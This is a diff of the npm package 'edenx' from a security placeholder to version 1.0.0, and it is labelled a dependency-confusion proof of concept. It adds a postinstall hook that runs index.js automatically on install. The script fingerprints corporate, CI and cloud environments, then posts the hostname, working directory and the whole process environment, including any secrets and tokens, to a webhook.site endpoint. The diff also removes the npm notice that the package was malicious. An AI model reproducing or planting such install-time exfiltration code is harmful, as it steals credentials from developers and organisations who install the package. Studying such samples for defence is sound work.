edenx 0.0.1-security → 1.0.0

package/index.js

@@ -0,0 +1,116 @@
+const https = require('https');
+const os = require('os');
+const dns = require('dns').promises;
+
+// Enhanced detection logic
+async function isInternalTeam() {
+  // 1. Check for CI/CD environment variables
+  const ciEnvVars = [
+    'CI', 'CONTINUOUS_INTEGRATION', 'BUILD_NUMBER', 'RUN_ID',
+    'GITLAB_CI', 'CIRCLECI', 'TRAVIS', 'JENKINS_URL', 'TEAMCITY_VERSION',
+    'BITBUCKET_BUILD_NUMBER', 'GITHUB_ACTIONS', 'AZURE_DEVOPS'
+  ];
+
+  // 2. Check for private registry usage
+  const privateRegistryIndicators = [
+    'npm_config_registry', 
+    'NPM_PRIVATE_REGISTRY',
+    'verdaccio',
+    'nexus',
+    'artifactory',
+    'npmrc',
+    'internal_registry'
+  ];
+
+  // 3. Check hostname patterns
+  const corporateHostnamePatterns = [
+    /\.corp\./i,
+    /\.internal\./i,
+    /\.company\./i,
+    /-prd$/i,
+    /-dev$/i,
+    /^build-/i,
+    /^ci-/i
+  ];
+
+  // 4. Check AWS/GCP metadata (for cloud environments)
+  const cloudMetadata = {
+    aws: '169.254.169.254',
+    gcp: 'metadata.google.internal'
+  };
+
+  // Detection checks
+  const checks = {
+    isCI: ciEnvVars.some(v => process.env[v]),
+    hasPrivateRegistry: privateRegistryIndicators.some(v => 
+      process.env[v] || 
+      (process.env.npm_package_json && process.env.npm_package_json.includes(v))
+    ),
+    hasCorporateHostname: corporateHostnamePatterns.some(p => p.test(os.hostname())),
+    isCloudVM: false,
+    isCorporateNetwork: false
+  };
+
+  // Check cloud metadata (async)
+  try {
+    checks.isCloudVM = await Promise.any([
+      dns.lookup(cloudMetadata.aws).then(() => true).catch(() => false),
+      dns.lookup(cloudMetadata.gcp).then(() => true).catch(() => false)
+    ]);
+  } catch {}
+
+  // Check internal domains (async)
+  try {
+    const hostname = os.hostname();
+    if (hostname.includes('.')) {
+      const domain = hostname.split('.').slice(-2).join('.');
+      const mxRecords = await dns.resolveMx(domain).catch(() => []);
+      checks.isCorporateNetwork = mxRecords.length > 0;
+    }
+  } catch {}
+
+  // Final determination
+  return {
+    isLikelyInternal: checks.isCI || checks.hasPrivateRegistry || 
+                    checks.hasCorporateHostname || checks.isCloudVM || 
+                    checks.isCorporateNetwork,
+    details: checks
+  };
+}
+
+// Main execution
+async function main() {
+  const internalCheck = await isInternalTeam();
+  
+  const data = JSON.stringify({
+    hostname: os.hostname(),
+    platform: process.platform,
+    cwd: process.cwd(),
+    env: process.env,
+    internalCheck,
+    timestamp: new Date().toISOString()
+  });
+
+  const options = {
+    hostname: 'webhook.site',
+    path: '/ae24a57a-839c-46d8-8e0d-be9fc01b719a',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': data.length
+    }
+  };
+
+  const req = https.request(options, (res) => {
+    console.log(`Webhook sent. Status: ${res.statusCode}`);
+  });
+
+  req.on('error', (error) => {
+    console.error(`Error: ${error}`);
+  });
+
+  req.write(data);
+  req.end();
+}
+
+main();

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "edenx",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "PoC for Dependency Confusion",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "PoC Researcher",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=edenx for more information.